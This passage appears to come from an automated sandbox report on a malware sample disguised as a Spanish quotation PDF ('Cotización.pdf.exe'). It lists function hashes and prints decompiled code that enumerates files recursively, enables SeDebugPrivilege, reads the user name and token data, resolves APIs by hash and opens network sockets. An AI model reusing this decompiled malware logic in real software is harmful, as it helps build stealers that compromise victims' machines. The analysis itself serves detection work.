                                        • Opcode ID: 642a6b6145234ab8120bf4c94a1bd1720f1f91708eddfe6b732a6eb969c0d323
                                        • Instruction ID: a8031d00ce818b3e02af4af007bb3d742be3279f63490d00b17554a63157c266
                                        • Opcode Fuzzy Hash: 642a6b6145234ab8120bf4c94a1bd1720f1f91708eddfe6b732a6eb969c0d323
                                        • Instruction Fuzzy Hash: BA61E4B4E152198FCB44CFA9D9809DEFBF2FF89250F24946AD416B7224D334AE418F64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8FD8, Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b0d95c4044dc5bc7866d18db8bfaa1f6e414acf1ce454fe56a9af097c803c214
                                        • Instruction ID: a296399a8c7d69f508aa883d64721c6c6210ad2d4b554713908c5230786018f1
                                        • Opcode Fuzzy Hash: b0d95c4044dc5bc7866d18db8bfaa1f6e414acf1ce454fe56a9af097c803c214
                                        • Instruction Fuzzy Hash: 2A61E6B0E15219CFCB44CF9AD5809DEFBF2FF89250F24946AD415B7214D334AA418F64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8738, Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39044c6bf7492a1179abb9e8b387945b805afd9ff009911ccc5db14e058424a3
                                        • Instruction ID: acd6d667891b951abfd947a7907dd94242d85389a20a441a05dbd72f1bef9e2c
                                        • Opcode Fuzzy Hash: 39044c6bf7492a1179abb9e8b387945b805afd9ff009911ccc5db14e058424a3
                                        • Instruction Fuzzy Hash: 8361F4B4A11219DFCB04CF99C9809AEFBF6FB89350F248556D41AA7254C334AE81CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8748, Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58c519a88cff6a279f87519044d78a360474b2a013ff62dcce0ee9aabdc4bea0
                                        • Instruction ID: 4cf26f5eb38136f14bee4d8ba421626d718c5730fd246f6b3d8ed184c55b37f8
                                        • Opcode Fuzzy Hash: 58c519a88cff6a279f87519044d78a360474b2a013ff62dcce0ee9aabdc4bea0
                                        • Instruction Fuzzy Hash: 6861E2B4E21219DFCB04CF99C98099EFBF6FB89310F249559D41AA7204D334AE81CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD9238, Relevance: .1, Instructions: 98COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2477786153a56e1377777ddb80a9c87a52c19e87d8e250522f9fe113c569ed4b
                                        • Instruction ID: 8dce07d64553a7f930802f92afcac5b9eb42cc32814cbe9f1f6e313a2f5c3017
                                        • Opcode Fuzzy Hash: 2477786153a56e1377777ddb80a9c87a52c19e87d8e250522f9fe113c569ed4b
                                        • Instruction Fuzzy Hash: BE41A4B0E0520ADBDB48CFAAC5405EEFBF6FB89300F14D56AC416B7254E774AA418F64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD9229, Relevance: .1, Instructions: 97COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72cf86e0d18aa48ffbf6cafdaca06c7347f2a28101a7d454756a336671a07eb1
                                        • Instruction ID: 4c7f1e64c576af41815e1be9660556040c2c7a71e921cebb60369a87479ec2b0
                                        • Opcode Fuzzy Hash: 72cf86e0d18aa48ffbf6cafdaca06c7347f2a28101a7d454756a336671a07eb1
                                        • Instruction Fuzzy Hash: 7E41B1B0E05209DFDB48CFAAC5405EEFBF2FF89200F14C56AC425A7254E734AA418B64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD3A69, Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b69cca79c7abe8440d4122a95ef30de12272ecf8c090267192fe12f2d2e98b8a
                                        • Instruction ID: b935e3dd4e866d9f33232fb73e40d419febf5f2f64bab11dc8549aa33c2677e1
                                        • Opcode Fuzzy Hash: b69cca79c7abe8440d4122a95ef30de12272ecf8c090267192fe12f2d2e98b8a
                                        • Instruction Fuzzy Hash: 27310E71E00615DFEB18CFABD84069EFBF3AFC9200F14C4AAD919A7264DB345A458F11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD93DA, Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99dea74185a2349a1450eea1263f99381d99a93a8b58ad5b438fd7fcb758da1e
                                        • Instruction ID: ee7a5dc91fb54cd854dd6e8ec0d0d9dda39bec4bef2e9984311b617991f8f67a
                                        • Opcode Fuzzy Hash: 99dea74185a2349a1450eea1263f99381d99a93a8b58ad5b438fd7fcb758da1e
                                        • Instruction Fuzzy Hash: D5211DB1E056189BEB18CFABDC006DEFBF7AFC8200F04C17AD418A6225DB345A468F51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 5436 Parent PID: 1724 Cotizaci#U00f3n.pdf.exeCOMMON

                                        Executed Functions

                                        Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 85%
                                        			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                        0x00403d82
                                        0x00403d88
                                        0x00403d8c
                                        0x00403d8d
                                        0x00403d90
                                        0x00403ea9
                                        0x00403ea9
                                        0x00403eb9
                                        0x00403ebb
                                        0x00403ec0
                                        0x00403f95
                                        0x00403f95
                                        0x00000000
                                        0x00403f95
                                        0x00403ece
                                        0x00403edb
                                        0x00403edd
                                        0x00403ee2
                                        0x00403f8e
                                        0x00403f8f
                                        0x00000000
                                        0x00403f94
                                        0x00000000
                                        0x00403ee8
                                        0x00403ef8
                                        0x00403f0a
                                        0x00403f12
                                        0x00403f18
                                        0x00403f26
                                        0x00403f28
                                        0x00403f2d
                                        0x00000000
                                        0x00000000
                                        0x00403f33
                                        0x00403f76
                                        0x00403f7c
                                        0x00000000
                                        0x00403f83
                                        0x00403f36
                                        0x00403f3a
                                        0x00000000
                                        0x00403f40
                                        0x00403f0c
                                        0x00403f10
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403f41
                                        0x00403f41
                                        0x00403f4b
                                        0x00403f58
                                        0x00403f5c
                                        0x00403f88
                                        0x00000000
                                        0x00403f8d
                                        0x00403f60
                                        0x00000000
                                        0x00403f60
                                        0x00403ef8
                                        0x00403ee8
                                        0x00403da3
                                        0x00403da9
                                        0x00403ea6
                                        0x00403ea8
                                        0x00000000
                                        0x00403ea8
                                        0x00403db7
                                        0x00403dc4
                                        0x00403dc6
                                        0x00403dcb
                                        0x00403e9d
                                        0x00403e9e
                                        0x00403ea4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403dd1
                                        0x00403dd1
                                        0x00403dd8
                                        0x00000000
                                        0x00000000
                                        0x00403de2
                                        0x00403e12
                                        0x00403e22
                                        0x00403e30
                                        0x00403e36
                                        0x00403e3f
                                        0x00403e44
                                        0x00403e47
                                        0x00403e4a
                                        0x00403e4c
                                        0x00000000
                                        0x00000000
                                        0x00403e63
                                        0x00403e65
                                        0x00403e6a
                                        0x00403e6f
                                        0x00403f64
                                        0x00403f6a
                                        0x00000000
                                        0x00403f71
                                        0x00000000
                                        0x00403e6f
                                        0x00403e26
                                        0x00403e27
                                        0x00403e2e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403e2e
                                        0x00403dea
                                        0x00403df9
                                        0x00000000
                                        0x00000000
                                        0x00403e01
                                        0x00403e10
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403e75
                                        0x00403e7f
                                        0x00403e8c
                                        0x00403e8e
                                        0x00403e97
                                        0x00000000

                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNext
                                        • String ID: %s\%s$%s\*$Program Files$Windows
                                        • API String ID: 1690352074-2009209621
                                        • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                        • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                        • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                        • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                        0x00406512
                                        0x00406514
                                        0x00406522
                                        0x00406524
                                        0x00406530
                                        0x00406534
                                        0x0040653f
                                        0x0040654e
                                        0x00406552
                                        0x0040655a
                                        0x0040655f
                                        0x0040656d
                                        0x00406570
                                        0x00406573
                                        0x0040657a
                                        0x00406589
                                        0x0040658d
                                        0x00406590
                                        0x00406594
                                        0x00000000
                                        0x0040659a
                                        0x004065a1

                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 3615134276-2896544425
                                        • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                        • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                        • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                        • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                        0x00402b8c
                                        0x00402b92
                                        0x00402b96
                                        0x00402b9e
                                        0x00402ba3
                                        0x00402baa

                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcess
                                        • String ID:
                                        • API String ID: 1357844191-0
                                        • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                        • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                        • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                        • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                        0x00406077
                                        0x00406082
                                        0x00406085

                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                        • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                        • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                        • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                        • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                        • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                        • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 75%
                                        			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                        0x004061c3
                                        0x004061cb
                                        0x004061cd
                                        0x004061d0
                                        0x004061de
                                        0x004061e0
                                        0x004061e5
                                        0x004061e9
                                        0x004061eb
                                        0x004061ed
                                        0x004061f2
                                        0x0040622a
                                        0x00406230
                                        0x00406235
                                        0x00406239
                                        0x0040623b
                                        0x00406244
                                        0x00406249
                                        0x00406249
                                        0x0040624c
                                        0x00406253
                                        0x00406256
                                        0x00406258
                                        0x00406261
                                        0x00406266
                                        0x00406266
                                        0x00406270
                                        0x00406273
                                        0x00406276
                                        0x0040627b
                                        0x0040627e
                                        0x0040628c
                                        0x0040628e
                                        0x00406290
                                        0x00406295
                                        0x0040629a
                                        0x0040629e
                                        0x004062a0
                                        0x004062ac
                                        0x004062af
                                        0x004062b7
                                        0x004062b9
                                        0x004062c9
                                        0x004062e0
                                        0x004062e2
                                        0x004062e4
                                        0x004062f3
                                        0x004062f3
                                        0x004062e4
                                        0x004062f8
                                        0x004062fd
                                        0x004062a0
                                        0x004062fe
                                        0x00406302
                                        0x00406307
                                        0x0040630c
                                        0x0040630d
                                        0x0040630f
                                        0x00406312
                                        0x00406317
                                        0x00406318
                                        0x0040631c
                                        0x0040631e
                                        0x00406321
                                        0x00406326
                                        0x00000000
                                        0x00406327
                                        0x004061f4
                                        0x004061ff
                                        0x00406208
                                        0x00406218
                                        0x0040621d
                                        0x00406224
                                        0x00406226
                                        0x00406228
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406228
                                        0x00406201
                                        0x00000000

                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                        • _wmemset.LIBCMT ref: 00406244
                                        • _wmemset.LIBCMT ref: 00406261
                                        • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: _wmemset$ErrorInformationLastToken
                                        • String ID: IDA$IDA
                                        • API String ID: 487585393-2020647798
                                        • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                        • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                        • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                        • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                        0x00404e1d
                                        0x00404e26
                                        0x00404e2a
                                        0x00404e2f
                                        0x00404e37
                                        0x00404e3a
                                        0x00404e45
                                        0x00404e4f
                                        0x00404e57
                                        0x00404e61
                                        0x00404e66
                                        0x00404e68
                                        0x00404e6c
                                        0x00404e6e
                                        0x00404e7a
                                        0x00404e80
                                        0x00404e84
                                        0x00404e9f
                                        0x00404ea7
                                        0x00404eab
                                        0x00404eb1
                                        0x00404eb1
                                        0x00404eb6
                                        0x00404ebe
                                        0x00404ecb
                                        0x00000000
                                        0x00404ec0
                                        0x00404ec1
                                        0x00404ec7
                                        0x00404ec7
                                        0x00404ecd
                                        0x00000000
                                        0x00404ece
                                        0x00404ebe
                                        0x00404e87
                                        0x00404e90
                                        0x00000000
                                        0x00404e90
                                        0x00000000

                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                        • socket.WS2_32(?,?,?), ref: 00404E7A
                                        • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                        Memory Dump Source
                                        • Source File: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: freeaddrinfogetaddrinfosocket
                                        • String ID:
                                        • API String ID: 2479546573-0
                                        • Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                        • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                        • Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
                                        • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

